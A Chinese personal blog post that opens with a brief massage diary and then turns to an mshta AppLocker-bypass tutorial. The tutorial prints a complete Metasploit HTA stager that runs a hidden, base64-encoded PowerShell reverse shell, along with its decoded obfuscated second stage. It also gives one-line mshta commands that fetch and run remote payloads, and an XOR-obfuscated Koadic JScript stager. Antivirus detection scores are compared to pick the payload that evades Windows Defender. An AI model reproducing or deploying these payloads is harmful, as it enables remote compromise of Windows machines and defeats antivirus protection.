INTP的日常-mshta绕过applocker

今天去做了泰式按摩,60分钟

先洗脚,然后到一个小隔间,用浴巾围起来。当然不穿衣服按摩的。

热毛巾热敷

按腿、左腿、右腿、大腿,然后按脖子、按背,脊柱附近,左边和右边的,按的有点疼。

然后翻个面,按手臂,手掌。

最后按头部。

一个小时就结束了。

感觉一个小时也挺快的,每个部位按十分钟或者几分钟。

小房间挺昏暗的,有轻音乐和鸟叫。让人很放松。

按摩前提供茶水,按摩结束,最后还提供了银耳粥。
按完以后整个人都香香的,香精都腌入味了。

mshta绕过applocker

mshta就是Microsoft HTML Application的缩写。那么hta又是什么呢?

HTA虽然用HTMLJSCSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)。

hta的核心是IE浏览器支持的脚本文件,例如VBScript、JScript。

metasploit mshta模块

使用mshta http://192.168.1.4:9997/28XMcvsHw2HdDxZ.hta 可以一句话上线

1
2
3
4
5
6
7
8
9
10
11
12
13
<script language="VBScript">
  window.moveTo -4000, -4000
  Set gfsKwAVKmx = CreateObject("Wscript.Shell")
  Set wVn = CreateObject("Scripting.FileSystemObject")
  For each path in Split(gfsKwAVKmx.ExpandEnvironmentStrings("%PSModulePath%"),";")
    If wVn.FileExists(path + "\..\powershell.exe") Then
      gfsKwAVKmx.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIACcAJwArACcAJwA0AHMASQBBAEwAZABSAEwARwBJAEMAQQA3AFYAVwArADIALwBpAE8AQgB7ADEAfQArAC8AYQBUADkASAA2AEkAVgBFAGsARwBsAEUARQByAG8AUwAxAHIAcAAnACcAKwAnACcARQBwADcAJwAnACsAJwAnAHAARQBhAHsAMQB9AGsAUQBZAEYARgBKAHoAYwB4AHcAYwBXAEoAYQBlAEsAVQAwAHIAMwA5ADMAMgA4AE0AUwBSAC8AYQA5AG0ANwB2AHAAJwAnACsAJwAnAEkAMgBFAFMATwB4ADUAKwBaAHQAdgBaAHIAeABNAEkANAA4AFQARgBrAGwASgBWAC8AcgAyADYAVABjAHAAZQAwAFkAbwBSAHEARQBrAEYAegBaAEIAQQA1ACsAJwAnACsAJwAnAFcAcABjAEoAZABvADMAYgB0AGwAVgA3ADIAQwA1AGkAZABPAEcAUABwAGkAeQBUAFAAdABjADIAbQB4AFUASgBFAG8AcwBYAGwAWgBUAE8ATgBZAHgAegB4AHcAMwBlAGwAaQA3AG0AVwBKAHsAMQB9AGkAOABwAFEAUQBuAGMAawBuADYAUwA1AHEAcwBjAEkAeQBQAGgANwBkADMAMgBPAFAAUwBOADYAbgB3AFoANgBWAEwAMgBTADIAaQBtAGQAaQAnACcAKwAnACcAdQBpAGIAdwBWAGwAbwA2ADEAeQBCAGQANwBmAGUAWQBoAEUAVgB2AEYAMgBsAHsAMQB9AEMANQBlAEwAWAByADgAWABTAC8ATABpADIAcQBMAFQAdgBVADAAUQBUAHUAVwBqAHQARQBvADcAewAxAH0AaQBrADkAcABzAFMAUgA5AEwAdwBtAEgAOQBtADYAewAxAH0ANQBhAEoASgB2AEoAZwBsAGIATQBrAHIARQB4AEwAVgBUAHkAcABPAGwASwBBAGwASABvAEMAMQBCADIAeABpAHYAbQBKACsAVQBvAFQAVAB2AEoAdwBuAHgAagB5AE4AbwArAHgAWQB3AHMANQBCAFMAaQA3AEMANgB5AGgAbQBuAHUAYgA3AE0AVQA2AFMAWQBsAG0AYQBDAHcALwB6AHgAZQBKADMAZQBaADYANQBIADYAYwBSAEoAeQBHAHUARwBCAEgASABNAGQAdABZAE8ASAA0AGcASABrADQAcQBQAFIAVAA1AEYASQAvAHgAYwBnAEYAYQBGAG8AOQBKAEYAQwB4AEsASgBSAEIANwBZAEcAcwBzAEYANgBLAFUAMAByAEwAMABYADgAegBJAEEANwB6AE4AdwBmAHQAWgBKAGYAbQAxAEUAawBpAE4AZQBGAHcAcQBRADIATABmAE8ANgBqAEoALwBKAFQAaQBnACcAJwArACcAJwAyAHIAeABuAFUAZwBQACcAJwArACcAJwBiAEMAagBCADgAOAB3AEkAQQBQAEcANwB3ACcAJwArACcAJwBIAEcAWgAwACsAaAArAGQAUABZAE8AagAxADQAVwA4AG0AZQArADMAOABFAFEAdABUAHgAaQBDAGQAbgByAGYAcABHAFUAcwBtAFMAQwBlADgAUgBaAHYASQBQAFAAZwBoADIAbgB1AEwAUgA0AHgAaAB6AHkAMAAyADYAUAB5AHoAOQByAHIAWgBhAHIAZwB1AEwAVAAyAFEAaABXADUAaQA0AGoALwB1AEoARgAvAHcAMABIAEMAcgB1AHUATABtAFEAKwBKAG4AUQBMAEwAMABtAEUAVwA3AHMASQBoAGMAVABMAE8AUwB1AC8AbAB4ACcAJwArACcAJwBhADgAcABIAGcAUABTAEMAVQBYAEcAMABCADgAYwBqAEgAYgB3AEgANABMAFUAeAB3AGcATABuAEEAVwA3AFAAaABCAHIAUgAwAFMALwBxAHkAcgBwADQAVAA2AE8ATgBZADgAUwBHACcAJwArACcAJwAwAEMAVQBVAEgAVwBTADIAKwB7ADEAfQBPAGEAUgBPAEwAaABxAFIAaQBVAE0AQQA3AC8AQQBOAGQAQwAwAHMAbwBWAEoAdwBMAHAAMQBWAHgAeQA3ADMATAByADUAQgBxAE4AaQBrAEsARQBuAEsAMABpAGkARgBVAHYAWABLAGsAbwAnACcAKwAnACcAVQBSAHgAWAA1AFoAMABxAEsARQBaAEYAdABhAHkAdABuACsAdABmAGcAUwByAHAAbABTAFQAagB5AFUAOABOAHoAYwBvAHYAUQBXAHoAYwB4AHIAawAwAFUASgBqADEATQBQAHMAZwBvAEkAMgBOAFkARwBlAHcAUgBSAEEAVQBoAFoANgBoAEUAZgA2AHoAdQBMACcAJwArACcAJwBCAEwAbgAzADQAcgB0AHcATgBCAEcAbABVAHsAMQB9ACcAJwArACcAJwA5AGcANgBRAEgAUwBBAFMAcwBDAEIAbwBzAEwAcgBzAFEAUQA2AEoANABYAHAAWQBxAEYAdQBSAEYAdQBLAEEANQBCAFoAdAA4ACcAJwArACcAJwA1AE8AaABRAEYAMABDAGUAeQBLAHQAbQBUAEMAdwBYAFkATAA3ADQAZgBaADEANABLAEIAOQA0AEwAWABIAEoAQQBYAGsAVQBKAHkAYgBZAG8ANAAyAFgASgBKAFQARwBIAE4AaQBRAHcAQgBuAEwAOQByAHgAaAArADcAewAxAH0AOABpAG0ARwBhAE0AcwA5AFQASQBlAFgAbgBOADkAUgAwAFgAQgBWAEIANAA4AGwAVgBCACcAJwArACcAJwAwAFEAeQBnAFAAUgB3AHgAQgB5AGcANgBNAFEAdAAxAGwATwBCAFQAOQBkAEIAbwA1AE0ALwBWAEkAUgBsAHAAOABFAHgAYgBQAFkAdABnAGQAMAAxAHEAeABoAFoAKwBKAHYAdwBjAGMAMwBuAFUAOQAwAGcAdwA0AGcAbwBMAFQAYQArAFoAagBMAHEAZABjADQAMQBzAGcANgAxADMAUAB0AEEAOAAvADgAcgBIAEYAeABiAEkAWABiAHMAcQBiACcAJwArACcAJwA0ADYAMAAzAGoAVgBSAGQASABYAGwANgBZAG8ATgA3ADQANwBCAGoAYQA3AEIAcAA0AGIAVwBzADEAYwBlAFYAVQBhAHQAWAB0AFcAYQBKAGcAcgBaADkAaQBhAG0AMQA5AEsAZgB0AGkAYwBKAEUARgBWAFYAZQB6AGUASwAnACcAKwAnACcAVgBxACsAcgB3ADcAcQB5AEIAdgBDAG0AcABCAGEAcwBOAFgAOABRAGsAdQAxAGoASAA5ADYAaABvAHcAJwAnACsAJwAnADcANwB1AHAASABvAGkAawBIAGIAVgA4ADMAeAA3AGUAUwBrAE0ANQB2AFEAWABsAFgAdAByAEoAWQBUAGwAbABpAG4AMAAxAGEAMQBXAHIAMwB3AFUAYgBkAEIAZgBVADEAbgAvAGcAbABOAGsAVAB0AG0AZABzADgATAA5AFcAcgBWAE4AWAAxAHUATwA3AFcAQgA3AFIAdwBGAFIAKwBLAGMAOQB1AFQAaQBGAEUAMABlAGsANgBsADEAWAB1AHYAZgBhAGMARQBmAEgAWAA5AHoARwA0ADQAZgAvAEwAbwBaADIAUABRADYARwBCAHsAMQB9ADEAYwBiAGoAVABIAFMAKwBrADYAOQBtAGsAbwBmAFMAZgB2AE4AUgBzAEoAWQBFAFgAVABVADkATgB1ADUAMgBhAHoAWABWAHcAMgA2AFgAeAB6AE4ASgA3AHMAOABrAGcAdgB0ADMAcQBiAEUAaABuAGoAUQAzADQAQQBqAC8AMwBHAHYAaABDAFYAOQBwAFMAMAAxAG8AcwAzAFkATAB7ADEAfQA1AG8AWABoAGQAQgBzAHsAMQB9AHYAegA0AGUAdQBjADcAWQBNAGQAMABMAHgAMgBxADUAUQA2AHYAagA2ADcANQBWAHEAMQBzAE8AZAB6ADEAMwB1AGsATwB0AFQAbQBOAFEAMwAxAHcANwBOAFUAZAAxAFEANgBVAHgAZQB7ADEAfQBJADAAcAA3AHUANgBJAGIATgBxAHQAMwBvAHgAdQBYAHEAawBBADYAYQAxACsAbQB6AFYAZwBiAFAAVQBmAE4AcwBOADcAMgBMAFgAVQBzADkAZwBiADQASwBDAHoAUgBJAFoAMgBoAE0ANAB1ADEASwA3AHIATwAxADAAMgBkAEkATgBWADcAWAB4ADUAaABSADAAMwBmADMANQAzAFQAewAxAH0AZwArAG0AbwBsADUAewAxAH0AdgBiAG4AdQBNAGcASQA3AEEAMQAnACcAKwAnACcAdwBHAHMAOAAwAG0AcgBxAHEATwByAGEAOQBaAHYAQgBhAFQAdQBBAGcAUABYADcANgAyADYAZwB0AGUARQBOAHcAZQA5AGEAMAAyADMAVQBJAFcAdgBuADYASwBaAGEAbQA0AEYAdgBOAFkAcgBjAGsAMABBAHoAWQBNACsAcAB6AFYAaAA3AGcANgA3AFUAaAA2AG8AcgA4AHYANgBrAEoAagAzAE4ARwA0AEwAOQBHAHoAbwB4AEIAOAB2AFQANwBnAFAAawA1AHYAeAB4AGEAQgB1AHAAYQBVAC8AVgAvAGwAMAA3AEgAVwBqAE4AcwAvACcAJwArACcAJwBQACsAaABMAGcAaAAwAHgAegBBADcAewAxAH0ATgB3AGQAKwA2AFEAaQBOAGQAUABGAG8AVwAwAGMAUwBPADYAKwA2AGYAZgBDAHUAbgBqAHUAdQBPADgAbwB2AEIASABBADgAeABFAGMAYgBKAEMARgBLAGcATgBnAHkAbgB2AEwAeAAwAFcAZAA3AEoAQgBNADIASgBFAGEATQBnAHkAMwBGAHYAVwBPAEkANAB3AGgAVABFAFAARgA0AEcAOABMAHsAMQB9AFYASwBtAFMAYwBtAG4AUgBoAEkATQBHAFEAUABvADAAOQBNAFkAcwBmAFkAeAAvAFQAZQBXADAAbAA2AEYAaQB5ADkAegBMADkAOAA2AGYASgB5AEIAaQBHAEsAYwB2AGYAVgBTAGgAOQBIAEEAVgArAFYAbABjAGUANgBvAHMAewAxAH0AVQBVAGgANABWAGQAVgAvAFEAUAAzACsAdQBKAHQAdgBzAFoARwBHAHIATABNAGIAZQBBAFoAagBNAE8ATgAwAGIAQgAzAHQAawBLAGMAbgB5AHIANABZAEsANwBqAGMAYwAyAHUAeQBIAFkASAAyAEUARwB6AGgAZQBRADEAZQBFAEwAbgAzAG8AVgBRAEkAOQBuAFQASAA2AEcAcgB2ADgAVwBNADkATQBlAEkAVQBkAGcARgBhAHsAMQB9AGsAOAAvAEYAMQBVAFkAdwBCAEEAdwBjADQAMwB1AHAAdwBNAFgAUQBmADMAMgBKAEsASwB3ADIAeABxACsAawBUAE4AWgB3AFYALwB7ADEAfQBuAC8AdwB0AGwAWAB0AGIAKwBZAGYAZQBuAGEASwBTAFUATQAyAHgAKwBXAEgAKwA3ADgARwBwAFUALwBUAEkAQQBKAG8AaAB3AGsATABOAGcAYwBGAEIAOAB1AE0AbQA4AGkAMABOAFcASgBhAC8AUwBDADUAbQBCAEcAbABoAG0AagA3AGoAaQB7ADEAfQAxAE4AKwBQAEkAQQBMADQAMwA1AHkALwBRADIAUQBYAEMAMwB2AFgAZwB3AEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcARAAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==",0
      Exit For
    End If
  Next
  window.close()
</script>

msf mshta原理

将里面base64编码的内容解码,得到下述的内容

可以发现反弹shell的原理就是VBScript调用powershell,powershell经过混淆,反弹shell。

1
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H''+''4sIALdRLGICA7VW+2/iOB{1}+/aT9H6IVEkGlEEroS1rp''+''Ep7''+''pEa{1}kQYFFJzcxwcWJaeKU0r39328MSR/a9m7vp''+''I2ESOx5+ZtvZrxMI48TFklJV/r26Tcpe0YoRqEkFzZBA5+''+''WpcJdo3btlV72C5idOGPpiyTPtc2mxUJEosXlZTONYxzxw3eli7mWJ{1}i8pQQnckn6S5qscIyPh7d32OPSN6nwZ6VL2S2imdi''+''uibwVlo61yBd7feYhEVvF2l{1}C5eLXr8XS/Li2qLTvU0QTuWjtEo7{1}ik9psSR9LwmH9m6{1}5aJJvJglbMkrExLVTypOlKAlHoC1B2xivmJ+UoTTvJwnxjyNo+xYws5BSi7C6yhmnub7MU6SYlmaCw/zxeJ3eZ65H6cRJyGuGBHHMdtYOH4gHk4qPRT5FI/xcgFaFo9JFCxKJRB7YGssF6KU0rL0X8zIA7zNwftZJfm1EkiNeFwqQ2LfO6jJ/JTig''+''2rxnUgP''+''bCjB88wIAPG7w''+''HGZ0+h+dPYOj14W8me+38EQtTxiCdnrfpGUsmSCe8RZvIPPgh2nuLR4xhzy026Pyz9rrZarguLT2QhW5i4j/uJF/w0HCruuLmQ+JnQLL0mEW7sIhcTLOSu/lx''+''a8pHgPSCUXG0B8cjHbwH4LUxwgLnAW7PhBrR0S/qyrp4T6ONY8SG''+''0CUUHWS2+{1}OaROLhqRiUMA7/ANdC0soVJwLp1Vxy73Lr5BqNikKEnK0iiFUvXKko''+''URxX5Z0qKEZFtaytn+tfgSrplSTjyU8NzcovQWzcxrk0UJj1MPsgoI2NYGewRRAUhZ6hEf6zuL''+''BLn34rtwNBGlU{1}''+''9g6QHSASsCBosLrsQQ6J4XpYqFuRFuKA5BZt8''+''5OhQF0CeyKtmTCwXYL74fZ14KB94LXHJAXkUJybYo42XJJTGHNiQwBnL9rxh+7{1}8imGaMs9TIeXnN9R0XBVB48lVB''+''0QygPRwxByg6MQt1lOBT9dBo5M/VIRlp8ExbPYtgd01qxhZ+Jvwcc3nU90gw4goLTa+ZjLqdc41sg613PtA8/8rHFxbIXbsqb''+''4603jVRdHXl6YoN747Bja7Bp4bWs1ceVUatXtWaJgrZ9iam19KfticJEFVVezeK''+''Vq+rw7qyBvCmpBasNX8Qku1jH96how''+''77upHoikHbV83x7eSkM5vQXlXtrJYTllin01a1Wr3wUbdBfU1n/glNkTtmds8L9WrVNX1uO7WB7RwFR+Kc9uTiFE0ek6l1XuvfacEfHX9zG44f/LoZ2PQ6GB{1}1cbjTHS+k69mkofSfvNRsJYEXTU9Nu52azXVw26XxzNJ7s8kgvt3qbEhnjQ34Aj/3GvhCV9pS01os3YL{1}5oXhdBs{1}vz4euc7YMd0Lx2q5Q6vj675Vq1sOdz13ukOtTmNQ31w7NUd1Q6Uxe{1}I0p7u6IbNqt3oxuXqkA6a1+mzVgbPUfNsN72LXUs9gb4KCzRIZ2hM4u1K7rO102dINV7Xx5hR03f353T{1}g+mol5{1}vbnuMgI7A1''+''wGs80mrqqOra9ZvBaTuAgPX7626gteENwe9a023UIWvn6KZam4FvNYrck0AzYM+pzVh7g67Uh6or8v6kJj3NG4L9GzoxB8vT7gPk5vxxaBupaU/V/l07HWjNs/''+''P+hLgh0xzA7{1}Nwd+6QiNdPFoW0cSO6+6ffCunjuuO8ovBHA8xEcbJCFKgNgynvLx0Wd7JBM2JEaMgy3FvWOI4whTEPF4G8L{1}VKmScmnRhIMGQPo09MYsfYx/TeW0l6Fiy9zL986fJyBiGKcvfVSh9HAV+Vlce6os{1}UUh4VdV/QP3+uJtvsZGGrLMbeAZjMON0bB3tkKcnyr4YK7jcc2uyHYH2EGzheQ1eELn3oVQI9nTH6Grv8WM9MeIUdgFa{1}k8/F1UYwBAwc43upwMXQf32JKKw2xq+kTNZwV/{1}n/wtlXtb+YfenaKSUM2x+WH+78GpU/TIAJohwkLNgcFB8uMm8i0NWJa/SC5mBGlhmj7ji{1}1N+PIAL435y/Q2QXC3vXgwAAA{0}{0}'')-f''='',''D'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

metasploit的免杀效果是不太行的。

https://www.virustotal.com/gui/file/93f2f86875690d47b753659f91695e0712941dfb4974587615e6fbc309ad2d12?nocache=1

可以看到查杀率为 29/57

其中 Microsoft TrojanDropper:VBS/PSRunner.G!MSR,代表着根本就不能用。默认windows就运行不了。

koadic模块

mshta http://IP:9999/B90eE

https://antiscan.me/scan/new/result?id=EPk4YC8cGM2m

10/26

其中 Windows 10 Defender: Clean

payload内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<html><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
<script language="JScript">
window.moveTo(-1337, -2019);
window.blur();
window.resizeTo(2, 4);

try
{
    window.onerror = function(sMsg, sUrl, sLine) { return false; }
    window.onfocus = function() { window.blur(); }
}
catch (e){}

function iHyfgYezYdlzJuWYzBQW(ZbFtBLJFye,rtQiUDRJRxXHhgR){var SbmAhbduRlCByVh='';while(rtQiUDRJRxXHhgR.length<ZbFtBLJFye.length){rtQiUDRJRxXHhgR+=rtQiUDRJRxXHhgR;}
for(i=0+0-0;i<ZbFtBLJFye.length;i+=(2+0-0)){var VWPwvEASzGQLjUsH=String.fromCharCode(parseInt(ZbFtBLJFye.substr(i,2+0-0),16+0-0)^rtQiUDRJRxXHhgR.charCodeAt(i/(2+0-0)));SbmAhbduRlCByVh=SbmAhbduRlCByVh+VWPwvEASzGQLjUsH;}
return SbmAhbduRlCByVh;}
var SHSzCQGBJVzghugTWn="xGiUpcNKgRznTmrzmwTxXUTIcKeVaTKlLdqoYXUZjSXBqHqekssmTNvXiaKJkjyCHryIvJwJxLwncWQhnEFVNuUQiNbExxNoVxonC";
var yGttXEzDktKBo="EYVnHFoyIMMyNBKPNOygbgTQbtinuAqeAMOzURnXfBkJxlFMWVJUIUaiqHbIPLLhkKMWJXRiVOYBibfrPoXVOkTTnEmRWbclNJsmzWppJFWJgQSdctdPVK";
var shQIRVqJzbCLRgzHXt="vZmEJAmYdbGdBhZwvxoVAiyKgRkPHtWkqSlMIrTgsVIxKbEaSgJEAnDNHZiJVvajHgWPTcJcJRcQwveoElsCObfVfOSBvAHld";
var yVqyQhWNIgBKd="ADNuJzwGEEzQIvYwjSCKNcJhIiHyjnguXOjxFLCPVXuONOUtylGabwSPkwMJobTfIUsZWeRKBEkIUQIiFBflWsfcUhuJikZibKHuqWHIYFIp";
var lFhVDQaCJXqiUOBj=[String.fromCharCode(SHSzCQGBJVzghugTWn.length),String.fromCharCode(yGttXEzDktKBo.length),String.fromCharCode(shQIRVqJzbCLRgzHXt.length),String.fromCharCode(yVqyQhWNIgBKd.length)];
var LwlLkzJLYDYcZQ=this[lFhVDQaCJXqiUOBj[0+0-0]+lFhVDQaCJXqiUOBj[1+0-0]+lFhVDQaCJXqiUOBj[2+0-0]+lFhVDQaCJXqiUOBj[3+0-0]];
LwlLkzJLYDYcZQ(iHyfgYezYdlzJuWYzBQW('4014406910627a292664023b051a7a2b0d097c217c111062712b267c69281e051e1225797e347f74345343512d53330839331f1f125853164661786557030540330821316916195e53264b3a2e53593e0e5a22023b746e6b3a66782d781d1f6c7e3d4278002a0e14060a37767a485c2c2d167512185931041719253a1551425d101e095546181c126c433b781438155e5a571b7210627a292664023b051a691e31646e2f661e02727a4c4e5833153f6c687f4407184300676b04075f5e02715b766f7e695f700f45570c780d7e2522680d350a0c0d1c5e646c317302196777333a0d65047f6724654050014005796a0252425a0977542d33766448050440042d6e050753577a132f171c13152a787a5b761c1c676c2123760f347274656b3a66782d781d1f6c7e3d4277162d1502171b2760794810212e42444b431f73546160757e4100055b007b6c0c0d4855096823766622154f017323737b086f0446540d22517e3572601205034202796e500747550072032a67736847000343567d69050f3d2b790222171c0b68200f144e781d146e7e25296a0d2d610c150939737e3f760a180b1645540876507f60726746030242017a780d7e2522680d350a0c0d1c5e7f7830660d0e637a38280d2114213533391f5c1e5c383210627a292664023b051a69173760623e620018677a5f227c143b1a060911227b1e57403c3452581d5f026904373367191e57423642257455441d40732b042e240a2924405716593a184f6403035322123c76756644101a13532529531d4a05566f2b1b181f1a24776c3f7e67036767392d6808320a1a6f7959384d01403021415d1f085f304f2c3a2823151a1f4e4f2a3b42571944556e1a325c33220949411c5c2d35411a02095c214f2c3a2823151a1f4e4f2a3b42571944556e1a325c33220949411c5c2d35411a050340690223393435581b0d0851282e555c5909193c1c452235290b4153195467395a5b0209186e5a32352624135a1e101b32273c4003153a3c162638233f071c590557277211135d4b6f3404687d603c5719111315657d111d4a1b592905202169331c5d45101a60614b3e120d44240967336e5a0b4f4b7f463b233c4f263f5335083f226921055b425d1b72273c571018532f492a7f4d2b0d3842074b43214055034c721232010e011926766f48781d146e7e25296a0d2d6103111121787a337808031857041e42220f3b060e14581b0d3f6607027c6034367a0b4f1a0006013a7e703f7310745d5d1d001805341c181f163964722c1b72273c571018532f492a7f4d2b0d4f3c3f6607027c6034367a0b4f16071418316a792677056750411f0f442e0e217e6e5a0b405301473b341640081c55280767212e3e145d415c13746714411f0855214364742e3e1556144e4f4310627a292664023b051a69093e6a7c277a181f7e7e4c0a4529023b3f283e581b3c0e463b233c4f17195e2415263929702a787a21620f186e783544194d1a3d333325025c1638533d3218521d035f354967676c1d11465e5b402834525b1c44196e4b7f2e76604002065c1c3d35654003055e20497e606e7e03475406463b335853595d197c1c45242224054058556803166264372e680b25677f6c0a3a7e6225740b027a7059451b604c687d1d1a3c666633701116721c5847176a46640c0d1c246270376a051e1e1d5a4b1d604a450c0d1c246270376a051e1e1d5a4b1d604a151c0b042074742d7e0d721f1f2b267c133109141f1c341a1f5e6803166264372e680b25677f7c2d7a515701512172531d7b174d3a6b050209083a66732f78057471723d397202291602166d0b4f0d3f6607027c6034367a0b4f08100b0532777e2c661874726e3e2a75092e041e0c6d16475816462035581c58664b3313365c3c261140163f781f0f717e233671085c050209083a66732f780574717323387b17280d07097e2775662c620302667930441230092037657b525f5f551d6b7114551d00126b436a0202725b107b25171506141f3b387e1f2b1b131d1a3c1c6f3b6a03087e6534247a6f48647469240846145c09203c1e7e3b3a65002b1d0c061f5e5b5811573115501c533f5503042d232000025b401c5e2c3d531658510d6a50665c35350447441b122f3b5a471457552b122a5c35350447441b123d2843514a113a24003b352f78151b3c0e402c2e43461f4c56260d3c337c2d0d387c217c111062712b267c6926091a1212357a6f2163671979653c2d6a123718177a36055c55015b26341e1d7b17443518452d31310212773d600009747a30237e7a2b1b181f1a24776c3f7e6712717f302e711d260b1a690215556410532d72147c3a4e1b652d020a1b033f746222731b1f6a683c05533543647428231f5442296e1e3358501e1b43672f1b0a1b13054044105c3d0c5346024e1b650820381b0c20405911472a2e78551c09126e5a39373570257763347f110f627938517a132f171c13152a787a5b7a0e117776303677032d61042237225757111a6b12141f53277c0a3d13050816246577277715067b5d121e5f344364742836046e6a225b273e59165a4e47344101021b0c3347440757272e6051031f59280f130a04250240531b106278427604055c232f3a3b253502101f4e402c2e43461f4c710f330605051e317d785e1063701c165a39751220020e12043d7b0d08382a3b42571944556e1a325c35350447441b101c345d5a1e4e1b651621747c2d7a78623b6a030e736e3b201e002703030515386b62241c1f0a7b602b22661d2e1b6b21251e51421c5d27721f3e0a18423e6b3420262250616c207d1b186577243a0d0d35010e0d0435687c391c011d7d75332d6a002503781535176053145661787e7f3d216c1b32001013725b106134600c066a79180f4228122030330c2c655f1b106278525b061f6c1b223a2435351e466010403a33595a2d3077350e3a2667725b10661a5e20394f682d2459341520243e0c2c767557196b145759144e197c08297e140a257d6437610a0f601a1d095e2015276877797a494410463c28581422366508330d05040526094b08382a3b42571944556e6b342b4d22154643075c6b0f58165a4e5b290e3838656b0d387c217c111062712b267c6926091a1212357a6f216367097375343f730e201a197a36055c55015b26341e1d7b17443518452d3131021273317713126e7822397c7a2b1b181f1a24776c3f7e6712717f302e711d260b1a690215556410532d72147c3a4e1b652d020a1b0329101d57611d1f7b682d2f4535132a3833131f5c42075d250953402d3073280f3b24657b525d5a296e1a3f4547184e1b650e21760a311e535110401506735a070542280f223329242c6e66277d0a1f65673e4e1b653310171513387b6230711d0f647153450b35043b23353e507772306801027a6724200b3a6b2c373333181a535c493450445105194229431a382c725b10581a4527780d497b266409390502020a3a7e183274050f7471393564164f000f15033f77672360016750411f0f442e0e217e6e5a0b46440c38322c574651216a062e0419161c206a0b3f6607027c6034367a0b4f081115043b627f3763077461732135600d391f1b06785251145e102d781a16543875654a6d1b17752c6e145e781d146e7e25296a0d2d610f09083a607e247701101e1d5a4e1e33193b746e6b0257420040277a7b6e30237b083003061f6b0d385514462a321e5158664b3a6b3d333325025c14570934507c603f347a1324151c0b7e37747a20700c126f6020427d10331d030605327c6048543c34554018035e6f48452d332209384d03533b7a747e242f60142e011d166d3a66782d781d1f6c7e3d427700331b1d17193263785b650e0a6f643b34600a206774353f05465355621b13786053401262350a1b17752c6e145e781d146e7e25296a0d2d610f09083a607e247701101e1d5a4e1e33193b746e6b0653445578030c63733b3e6a062e72140d053362653a7c020b184701005933496d0a350c1e101f4e5426281e42101e102e5c7f6d2e6c3a7860207503086c753e425c220f28222f6b19191d5c383215776c29287101281b077a1a3a646332781b00777b2a056d69123f3a2e24581016571b72157e6d24367b01271b077a645d060d36681e1175603c2a7a135c767b7e6b246a622d62080865773c5156260d3c337c361f401e03533b7a5c0941575a7b2e0e0e1f1431747f21636736535a1618587c0b647d6e5a0b5b505d7d08026e70302a791330143c1a797a49752f65021962793726646c5c797b726b19541e36681e1175603c2a7a135c72646c625614622d66110a7766222f7d6e1a3d333325025c163a7311027275372564163a250b7c2d0d385f131a061b6e6c352d760e351e0d2d0d4d0f14451c6b7114045f5c1e7743665c3c1f386b632f790f1c62655a51096a5974